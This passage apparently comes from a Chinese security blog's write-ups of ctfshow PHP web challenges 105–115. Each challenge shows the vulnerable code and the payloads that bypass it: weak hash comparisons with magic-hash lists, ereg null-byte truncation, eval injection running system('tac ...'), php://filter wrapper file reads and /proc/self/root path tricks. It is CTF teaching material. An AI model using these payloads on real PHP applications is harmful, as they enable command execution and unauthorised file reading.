<p>$suces = $flag</p>
<p>$error = $suces</p>
</blockquote>
<p><code>$error</code>的值随着<code>$flag</code>的值变化而变化，将<code>$error</code>=<code>$flag</code>利用POST传输可以绕过对于POST的过滤，而<code>$suces</code>=<code>$flag</code>利用GET方式进行传输可绕过对GET的过滤，满足条件，构造payload。</p>
<blockquote>
<p>GET:?suces=flag</p>
<p>POST:error=suces</p>
</blockquote>
<h1 id="Web-106-sha1弱比较"><a href="#Web-106-sha1弱比较" class="headerlink" title="Web-106 sha1弱比较"></a>Web-106 sha1弱比较</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">highlight_file(__FILE__);
include(&quot;flag.php&quot;);

if(isset($_POST[&#39;v1&#39;]) &amp;&amp; isset($_GET[&#39;v2&#39;]))&#123;
    $v1 &#x3D; $_POST[&#39;v1&#39;];
    $v2 &#x3D; $_GET[&#39;v2&#39;];
    if(sha1($v1)&#x3D;&#x3D;sha1($v2) &amp;&amp; $v1!&#x3D;$v2)&#123;
        echo $flag;
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>与第104题相似，不过多了一个条件，<code>$v1</code>与<code>$v2</code>之间sha1密文可以相同，但字符串不能相同，不能使用104题的方法进行绕过。</p>
<p>可进行数组绕过：</p>
<blockquote>
<p>GET:?v2[]=1</p>
<p>POST:v1[]=2</p>
</blockquote>
<p>如果强制类型转换，需要找sha1密文不同但解码出来的明文相同，以下：</p>
<blockquote>
<p>aaroZmOk<br>aaK1STfY<br>aaO8zKZF<br>aa3OFF9m</p>
</blockquote>
<h1 id="Web-107-md5弱比较"><a href="#Web-107-md5弱比较" class="headerlink" title="Web-107 md5弱比较"></a>Web-107 md5弱比较</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">highlight_file(__FILE__);
error_reporting(0);
include(&quot;flag.php&quot;);

if(isset($_POST[&#39;v1&#39;]))&#123;
    $v1 &#x3D; $_POST[&#39;v1&#39;];
    $v3 &#x3D; $_GET[&#39;v3&#39;];
       parse_str($v1,$v2);
       if($v2[&#39;flag&#39;]&#x3D;&#x3D;md5($v3))&#123;
           echo $flag;
       &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<h2 id="parse-str函数"><a href="#parse-str函数" class="headerlink" title="parse_str函数"></a>parse_str函数</h2><p>将字符串解析成多个变量</p>
<p>语法:</p>
<blockquote>
<p>parse_str ( string <code>$encoded_string</code> [, array <code>&amp;$result</code> ] ) : void</p>
</blockquote>
<p>如果设置了result变量，变量将会以数组的形式存入到这个数组作为替代。</p>
<p>根据题意，判断为md5的弱比较，需要使<code>$v2[&#39;flag&#39;]==md5($v3)</code>两边同时为FALSE或TRUE，</p>
<p>构造payload：</p>
<p><code>GET: ?v3[]=1    POST: v1=</code> 满足两边同时为NULL，NULL==NULL为TRUE，因此成立</p>
<p>or</p>
<p><code>GET: ?v3=1    POST: v1=flag=c4ca4238a0b923820dcc509a6f75849b</code> v1中的值为md5，两边弱比较为TRUE</p>
<p>或者使用<code>0e</code>开头的md5，采用00截断的方法绕过</p>
<div class="code-wrapper"><pre class="line-numbers language-none"><code class="language-none">0e开头的md5和原值：
QNKCDZO
0e830400451993494058024219903391
240610708
0e462097431906509019562988736854
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<h1 id="Web-108-ereg-00截断"><a href="#Web-108-ereg-00截断" class="headerlink" title="Web-108 ereg %00截断"></a>Web-108 ereg %00截断</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">highlight_file(__FILE__);
error_reporting(0);
include(&quot;flag.php&quot;);
if (ereg (&quot;^[a-zA-Z]+$&quot;, $_GET[&#39;c&#39;])&#x3D;&#x3D;&#x3D;FALSE)  &#123;
    die(&#39;error&#39;);
&#125;
&#x2F;&#x2F;只有36d的人才能看到flag
if(intval(strrev($_GET[&#39;c&#39;]))&#x3D;&#x3D;0x36d)&#123;
    echo $flag;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<h2 id="ereg"><a href="#ereg" class="headerlink" title="ereg"></a>ereg</h2><p>正则表达式匹配。如今已被<code>preg_match()</code>函数替代。</p>
<p><code>ereg()</code>用指定的模式搜索一个字符串中指定的字符串，如果匹配成功返回true，反之返回false。搜索的字符是大小写敏感的。<code>ereg()</code>存在NULL截断漏洞，导致正则过滤被绕过，可以使用%00截断正则匹配</p>
<h2 id="strrev"><a href="#strrev" class="headerlink" title="strrev"></a>strrev</h2><p>反转字符串</p>
<h2 id="intval"><a href="#intval" class="headerlink" title="intval"></a>intval</h2><p>获取变量的整数值。通过指定的进制<code>base</code>转换(默认十进制)</p>
<p>已知：通过正则表达式<code>ereg</code>字符串中需要包含字母通过if判断，且将字符串倒转以后<code>$_GET[&#39;c&#39;]</code>与<code>0x36d</code>弱相等。<code>887</code>为<code>0x36d</code>的10进制</p>
<p>综上所述，构造出payload</p>
<blockquote>
<p>a%00778</p>
</blockquote>
<p>由于<code>ereg</code>的漏洞，正则表达式只会匹配到<code>%00</code>之前的字符，后面的已经被截断，通过验证之后，将payload倒转成<code>877%00a</code>再用intval函数获取整数部分<code>887</code>。</p>
<h1 id="Web-109-反射类，异常类"><a href="#Web-109-反射类，异常类" class="headerlink" title="Web-109 反射类，异常类"></a>Web-109 反射类，异常类</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET[&#39;v1&#39;]) &amp;&amp; isset($_GET[&#39;v2&#39;]))&#123;
    $v1 &#x3D; $_GET[&#39;v1&#39;];
    $v2 &#x3D; $_GET[&#39;v2&#39;];
    if(preg_match(&#39;&#x2F;[a-zA-Z]+&#x2F;&#39;, $v1) &amp;&amp; preg_match(&#39;&#x2F;[a-zA-Z]+&#x2F;&#39;, $v2))&#123;
            eval(&quot;echo new $v1($v2());&quot;);
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>考察点：PHP反射类、异常类</p>
<p>从<code>preg_match</code>正则表达式中可知匹配至少有一个字母的字符串。因此只要new后面有个类不报错就可以随意构造，并且可以直接执行系统命令。</p>
<p>反射类:<code>ReflectionClass</code></p>
<p>异常类:<code>Exception</code></p>
<p>payload:</p>
<blockquote>
<p>?v1=Exception;system(‘tac fl36dg.txt’);//&amp;v2=a</p>
<p>?v1=Exception&amp;v2=system(‘tac fl36dg.txt’)</p>
<p>?v1=RefletionClass&amp;v2=system(‘tac fl36dg.txt’)</p>
</blockquote>
<h1 id="Web-110-FilesystemIterator类"><a href="#Web-110-FilesystemIterator类" class="headerlink" title="Web-110 FilesystemIterator类"></a>Web-110 FilesystemIterator类</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET[&#39;v1&#39;]) &amp;&amp; isset($_GET[&#39;v2&#39;]))&#123;
    $v1 &#x3D; $_GET[&#39;v1&#39;];
    $v2 &#x3D; $_GET[&#39;v2&#39;];

    if(preg_match(&#39;&#x2F;\~|\&#96;|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\_|\-|\+|\&#x3D;|\&#123;|\[|\;|\:|\&quot;|\&#39;|\,|\.|\?|\\\\|\&#x2F;|[0-9]&#x2F;&#39;, $v1))&#123;
            die(&quot;error v1&quot;);
    &#125;
    if(preg_match(&#39;&#x2F;\~|\&#96;|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\_|\-|\+|\&#x3D;|\&#123;|\[|\;|\:|\&quot;|\&#39;|\,|\.|\?|\\\\|\&#x2F;|[0-9]&#x2F;&#39;, $v2))&#123;
            die(&quot;error v2&quot;);
    &#125;
    eval(&quot;echo new $v1($v2());&quot;);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>正则表达式过滤除字母外的所有字符，通过<code>FilesystemIterator</code>内置类绕过读取当前目录下的文件。PHP中的<code>getcwd()</code>可以做到</p>
<p>payload:<code>?v1=FilesystemIterator&amp;v2=getcwd</code></p>
<p>读取到当前目录存在<code>fl36dga.txt</code>,浏览器直接访问得到flag。</p>
<h1 id="Web-111-GLOBALS全局变量"><a href="#Web-111-GLOBALS全局变量" class="headerlink" title="Web-111 GLOBALS全局变量"></a>Web-111 GLOBALS全局变量</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">include(&quot;flag.php&quot;);
function getFlag(&amp;$v1,&amp;$v2)&#123;
    eval(&quot;$$v1 &#x3D; &amp;$$v2;&quot;);
    var_dump($$v1);
&#125;

if(isset($_GET[&#39;v1&#39;]) &amp;&amp; isset($_GET[&#39;v2&#39;]))&#123;
    $v1 &#x3D; $_GET[&#39;v1&#39;];
    $v2 &#x3D; $_GET[&#39;v2&#39;];
    if(preg_match(&#39;&#x2F;\~| |\&#96;|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\_|\-|\+|\&#x3D;|\&#123;|\[|\;|\:|\&quot;|\&#39;|\,|\.|\?|\\\\|\&#x2F;|[0-9]|\&lt;|\&gt;&#x2F;&#39;, $v1))&#123;
            die(&quot;error v1&quot;);
    &#125;
    if(preg_match(&#39;&#x2F;\~| |\&#96;|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\_|\-|\+|\&#x3D;|\&#123;|\[|\;|\:|\&quot;|\&#39;|\,|\.|\?|\\\\|\&#x2F;|[0-9]|\&lt;|\&gt;&#x2F;&#39;, $v2))&#123;
            die(&quot;error v2&quot;);
    &#125;
    if(preg_match(&#39;&#x2F;ctfshow&#x2F;&#39;, $v1))&#123;
            getFlag($v1,$v2);
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>php变量地址引用。利用全局变量赋值给ctfshow这个变量。</p>
<p>payload:<code>?v1=ctfshow&amp;v2=GLOBALS</code></p>
<h1 id="Web-112-is-file绕过-php伪协议"><a href="#Web-112-is-file绕过-php伪协议" class="headerlink" title="Web-112 is_file绕过,php伪协议"></a>Web-112 is_file绕过,php伪协议</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">function filter($file)&#123;
    if(preg_match(&#39;&#x2F;\.\.\&#x2F;|http|https|data|input|rot13|base64|string&#x2F;i&#39;,$file))&#123;
        die(&quot;hacker!&quot;);
    &#125;else&#123;
        return $file;
    &#125;
&#125;
$file&#x3D;$_GET[&#39;file&#39;];
if(! is_file($file))&#123;
    highlight_file(filter($file));
&#125;else&#123;
    echo &quot;hacker!&quot;;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<h2 id="is-file"><a href="#is-file" class="headerlink" title="is_file()"></a>is_file()</h2><p>is_file函数。判断给定文件名是否为一个正常的文件。</p>
<p>如果文件存在且为正常的文件则返回TRUE，否则返回FALSE。</p>
<p>审计代码后发现，如果文件名不为正常的文件，则高亮显示flag。</p>
<p>因此需要做到高亮显示flag文件但文件必须存在。</p>
<p>使用PHP伪协议进行绕过</p>
<h2 id="实验："><a href="#实验：" class="headerlink" title="实验："></a>实验：</h2><p>1.</p>
<p><img src="https://gitee.com/zku4n/picgo/raw/master/img/image-20211201191106865.png" srcset="/img/loading.gif" lazyload alt="image-20211201191106865"></p>
<p>当文件存在当前目录时，返回<code>TRUE</code></p>
<p>2.</p>
<p><img src="https://gitee.com/zku4n/picgo/raw/master/img/image-20211201191243482.png" srcset="/img/loading.gif" lazyload alt="image-20211201191243482"></p>
<p>当文件存在当前目录，使用PHP伪协议时，返回<code>FALSE</code></p>
<p>绕过条件</p>
<p>payload:</p>
<blockquote>
<p>?file:php://filter/resource=flag.php</p>
<p>?file:php://filter/convert.iconv.UCS-2LE.UCS-2BE/resource=flag.php</p>
<p>?file=php://filter/read=convert.quoted-printable-encode/resource=flag.php</p>
<p>?file=compress.zlib://flag.php</p>
</blockquote>
<p>关于过滤器php://的参考文档：<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/wrappers.php.php">https://www.php.net/manual/zh/wrappers.php.php</a></p>
<p>php://filter/实战技巧：<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/202510">https://www.anquanke.com/post/id/202510</a></p>
<h1 id="Web-113-目录溢出"><a href="#Web-113-目录溢出" class="headerlink" title="Web-113 目录溢出"></a>Web-113 目录溢出</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">function filter($file)&#123;
    if(preg_match(&#39;&#x2F;filter|\.\.\&#x2F;|http|https|data|data|rot13|base64|string&#x2F;i&#39;,$file))&#123;
        die(&#39;hacker!&#39;);
    &#125;else&#123;
        return $file;
    &#125;
&#125;
$file&#x3D;$_GET[&#39;file&#39;];
if(! is_file($file))&#123;
    highlight_file(filter($file));
&#125;else&#123;
    echo &quot;hacker!&quot;;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>预期解：</p>
<p><code>?file=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php</code></p>
<blockquote>
<p>在Linux中/proc/self/root指向根目录，也就是说如果在命令行中输入ls /proc/self/root其实显示的是根目录下的内容，多次重复后可以绕过is_file</p>
</blockquote>
<p>非预期解：</p>
<p>利用没有被过滤的伪协议读文件：</p>
<p><code>?file=compress.zlib://flag.php</code></p>
<h1 id="Web-114-filter"><a href="#Web-114-filter" class="headerlink" title="Web-114 filter"></a>Web-114 filter</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">function filter($file)&#123;
    if(preg_match(&#39;&#x2F;compress|root|zip|convert|\.\.\&#x2F;|http|https|data|data|rot13|base64|string&#x2F;i&#39;,$file))&#123;
        die(&#39;hacker!&#39;);
    &#125;else&#123;
        return $file;
    &#125;
&#125;
$file&#x3D;$_GET[&#39;file&#39;];
echo &quot;师傅们居然tql都是非预期 哼！&quot;;
if(! is_file($file))&#123;
    highlight_file(filter($file));
&#125;else&#123;
    echo &quot;hacker!&quot;;
&#125; 师傅们居然tql都是非预期 哼！<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>过滤中没有php和filter。</p>
<p>payload:<code>?file=php://filter/resource=flag.php</code></p>
<h1 id="Web-115-trim绕过"><a href="#Web-115-trim绕过" class="headerlink" title="Web-115 trim绕过"></a>Web-115 trim绕过</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">include(&#39;flag.php&#39;);
highlight_file(__FILE__);
error_reporting(0);
function filter($num)&#123;
    $num&#x3D;str_replace(&quot;0x&quot;,&quot;1&quot;,$num);
    $num&#x3D;str_replace(&quot;0&quot;,&quot;1&quot;,$num);
    $num&#x3D;str_replace(&quot;.&quot;,&quot;1&quot;,$num);
    $num&#x3D;str_replace(&quot;e&quot;,&quot;1&quot;,$num);
    $num&#x3D;str_replace(&quot;+&quot;,&quot;1&quot;,$num);
    return $num;
&#125;
$num&#x3D;$_GET[&#39;num&#39;];
if(is_numeric($num) and $num!&#x3D;&#x3D;&#39;36&#39; and trim($num)!&#x3D;&#x3D;&#39;36&#39; and filter($num)&#x3D;&#x3D;&#39;36&#39;)&#123;
    if($num&#x3D;&#x3D;&#39;36&#39;)&#123;
        echo $flag;
    &#125;else&#123;
        echo &quot;hacker!!&quot;;
    &#125;
&#125;else&#123;
    echo &quot;hacker!!!&quot;;
&#125; <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<h2 id="trim"><a href="#trim" class="headerlink" title="trim"></a>trim</h2><p>去除字符串首尾处的空白字符（或者其他字符）</p>
<p>语法：</p>
<p><code>trim(string,charlist)</code></p>
<p>描述：</p>
<p>string        必需。规定要检查的字符串</p>
<p>charlist      可选。规定从字符串中删除哪些字符。如果省略该函数，则移除下列所有字符。</p>
<blockquote>
<p>“\0”        - NULL</p>
<p>“\t”        - 制表符</p>
<p>“\n”        - 换行符</p>
<p>“\x0B”      - 垂直制表符</p>
<p>“\r”        - 回车</p>
<p>“ “         - 空格    </p>
</blockquote>
<h2 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h2><p><img src="https://gitee.com/zku4n/picgo/raw/master/img/image-20211202105809062.png" srcset="/img/loading.gif" lazyload alt="image-20211202105809062"></p>
<p>输出<code>%09 %0A %0B %0C %0D + %2B - . 0 1 2 3 4 5 6 7 8 9</code></p>
<p><img src="https://gitee.com/zku4n/picgo/raw/master/img/image-20211202105318433.png" srcset="/img/loading.gif" lazyload alt="image-20211202105318433"></p>
<p>输出<code> %0C %2B - . 0 1 2 3 4 5 6 7 8 9</code></p>
<p>因为<code>%2B</code> <code>-</code> <code>.</code> 被过滤</p>
<p>在数字前加空格也会被is_numeric识别为数字，trim过滤空格不会过滤<code>\f</code>(%0c)</p>
<p>payload:<code>?num=%0c36</code></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/WebSec/">WebSec</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Security/">Security</a>
                    
                      <a class="hover-with-bg" href="/tags/Web/">Web</a>
                    
                      <a class="hover-with-bg" href="/tags/PHP/">PHP</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/12/09/Directory-Traversal/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Directory Traversal</span>
                        <span class="visible-mobile">Vorheriger</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/11/04/Linux-Security/">
                        <span class="hidden-mobile">Linux-Security</span>
                        <span class="visible-mobile">Nächster</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Suchen</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">Stichwort</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  
    
  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
